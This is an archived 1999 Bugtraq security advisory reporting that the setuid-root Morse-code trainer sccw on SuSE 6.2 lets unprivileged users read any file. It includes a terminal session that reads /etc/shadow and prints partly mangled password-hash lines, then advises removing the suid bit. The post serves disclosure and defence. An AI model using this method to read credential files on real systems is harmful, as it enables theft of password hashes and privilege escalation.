[11935] in bugtraq
SuSE 6.2 /usr/bin/sccw read any file
daemon@ATHENA.MIT.EDU (Brock Tellier)
Fri Sep 17 04:07:18 1999
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Message-Id: <043101bf00a3$8088c720$3177a8c0@webley>
Date: Thu, 16 Sep 1999 19:28:02 -0500
Reply-To: Brock Tellier <btellier@WEBLEY.COM>
From: Brock Tellier <btellier@WEBLEY.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Greetings,
/usr/bin/sccw, suid root by default on SuSE 6.2, allows any user to
read any file on the system. Sort of. Well, it's enough to read the
text of almost anything. In capitals. Without punctuation. Check it
out:
xnec@susebox:/tmp > id
uid=1001(xnec) gid=100(users) groups=100(users)
xnec@susebox:/tmp > sccw
==========================================================
Soundcard CW for Linux v1.1 Steven J. Merrifield, VK3ESM
==========================================================
1. Set the speed, currently = 10
2. Set the frequency, currently = 700
3. Set the volume, currently = 32
4. Set the delay value, currently = 3
5. Set the character set for random groups, currently = 1
6. Set the number of groups, currently = 5
7. Receive random character groups.
8. Receive a file.
9. QUIT
==========================================================
Enter your choice : 8
Enter filename : /etc/shadow
ROOTFGPZNZWZ5GWRG10850010000
BIN8902010000
DAEMON8902010000
... etc.
The printing of these lines takes a few seconds each, so be patient.
While you're waiting, remove the suid-bit.
Of course, getting the /etc/shadow file in all caps isn't instant root,
but it's a start for someone out there. Besides, he can still read your
mail in all caps, without punctuation.
Brock Tellier
UNIX Systems Administrator
Webley Systems
www.webley.com
